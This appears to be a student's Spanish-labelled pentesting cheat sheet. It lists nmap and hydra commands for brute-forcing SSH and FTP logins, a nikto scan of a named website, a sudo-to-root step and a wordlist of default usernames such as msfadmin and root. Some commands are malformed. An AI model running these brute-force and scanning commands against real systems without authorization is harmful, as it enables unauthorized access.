

hacer un attack con nmap y un dic	nmap -p 22 --script ssh-brute --script-args usrdb=passwords.txt,passdb=passwords.txt 10.0.2.6				
conectarse por ssh a un ssh antig	ssh -o HostKeyAlgorithms=+ssh-rsa user@192.168.5.7			txt crear nombres de user	
	msfadmin			msfadmin	
pasar a root	sudo -s			user	
para escanear un puerto 21 ftp	nmap -sV -p 21 192,168,1,0			postgres	
	hydra -l passwords.txt -P passwords.txt -t 4 ftp://192.168.1.14\n			service	
	nikto -h https://academy.seguridadcero.com.pe/			sysadmin	
				ubuntu	
				klog	
				admin	
				guest	
				root	
				test	
				backup	
				developer	
				operator	
				support	
				manager	
				default	
				anonymous	
				maintain	
				demo	
				administrator	
				superuser	
				engineer	
				qa	
				security	
				ftpuser	
				database	
				tester	
				devops	

				produser	
				ciuser	